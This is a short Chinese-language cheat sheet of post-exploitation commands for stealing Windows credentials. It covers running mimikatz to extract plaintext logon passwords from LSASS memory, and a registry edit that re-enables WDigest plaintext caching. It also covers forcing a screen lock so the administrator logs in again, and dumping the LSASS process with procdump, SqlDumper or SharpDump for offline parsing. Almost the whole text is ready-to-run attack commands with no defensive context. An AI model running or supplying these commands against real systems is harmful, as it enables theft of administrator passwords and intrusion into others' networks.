一.windows2008以上不保存明文密码解决办法
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取。
cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
在开启 Wdigest Auth 后,需要管理员重新登录才能抓明文密码。
强制锁屏,让管理员重新登录。
rundll32 user32.dll,LockWorkStation
二.procdump+mimikatz
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
三.SqlDumper + mimikatz
SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本目标机没有的话可以自己上传
tasklist /svc |findstr lsass.exe
Sqldumper.exe 进程ID 0 0x01100
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
四.SharpDump+ mimikatz
https://github.com/GhostPack/SharpDump
编译生成SharpDump.exe文件大小不超10kb
进入c:\windows\temp\将debug.bin文件提取出来修改后缀bin为zip解压出来
mimikatz.exe "sekurlsa::minidump debug472" "sekurlsa::logonPasswords full" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt